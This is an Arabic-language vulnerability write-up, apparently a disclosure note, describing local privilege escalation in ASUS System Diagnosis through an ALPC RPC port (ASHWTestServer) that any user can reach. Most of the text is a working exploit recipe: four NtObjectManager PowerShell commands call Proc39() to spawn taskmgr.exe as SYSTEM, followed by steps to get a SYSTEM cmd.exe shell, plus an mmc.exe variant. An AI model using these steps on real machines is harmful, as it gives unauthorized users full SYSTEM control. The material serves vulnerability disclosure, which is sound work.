
المسار الكامل: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
المشكلة:
منفذ ALPC \RPC Control\ASHWTestServer الذي يعرضه AsusSystemDiagnosis.exe قابل للوصول بالكامل لأي مستخدم. استدعاء Proc39() عبر RPC من خلال هذا المنفذ يقوم بإنشاء عملية taskmgr.exe بصلاحيات SYSTEM في جلسة المستخدم الحالي.
الاستغلال:
باستخدام أداة NtObjectManager RPC من مشروع Project Zero من https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (تأكد من أخذ الإصدار المُجمّع) يمكن الاتصال بمنفذ RPC الضعيف وعندها يمكن استدعاء Proc39(). بمجرد إنشاء عملية taskmgr.exe بصلاحيات SYSTEM يمكن إنشاء شل cmd.exe باستخدام وظيفة "تشغيل مهمة جديدة" من خلال قائمة السياق، ملف > تشغيل مهمة جديدة > cmd.exe.
NtObjectManager:
$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
$client = get-rpcclient $server
$client.connect()
$client.Proc39()
نفس ما سبق لكنه يقوم بإنشاء mmc.exe بصلاحيات النظام. يمكن إما إنشاء مهمة جديدة أو استخدام وظيفة التصفح لفتح نافذة explorer.exe وتنفيذ cmd.exe من شريط العناوين.
ملاحظات إضافية: